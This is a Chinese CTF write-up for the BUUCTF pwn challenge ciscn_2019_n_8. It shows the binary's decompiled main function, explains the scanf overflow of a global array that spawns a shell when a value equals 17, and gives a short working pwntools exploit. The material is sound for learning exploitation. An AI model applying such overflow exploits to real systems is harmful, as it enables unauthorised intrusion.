BUUCTF pwn ciscn_2019_n_8

0x01 文件分析

BUUCTF pwn ciscn_2019_n_8_第1张图片
 文件很简单,32位,保护都开得差不多。

0x02 运行

BUUCTF pwn ciscn_2019_n_8_第2张图片
 输入并且回显。

0x03 IDA源码分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

在这里插入图片描述
 var可以看做是一个int型的数组,根据源码得到*(_QWORD *)&var[13] == 17就可以得到shell,QWORD是8个字节,所以意思是要将var[13]之后的8个字节的数据赋值为17。

0x04 exp

from pwn import *

p = process('./pwn')

p.sendline("s"*13*4+p64(0x11)+"sss")

p.sendline('cat flag')
p.interactive()

一个简单的网络安全公众号,欢迎各位朋友们关注!

在这里插入图片描述

你可能感兴趣的:(ctf_pwn)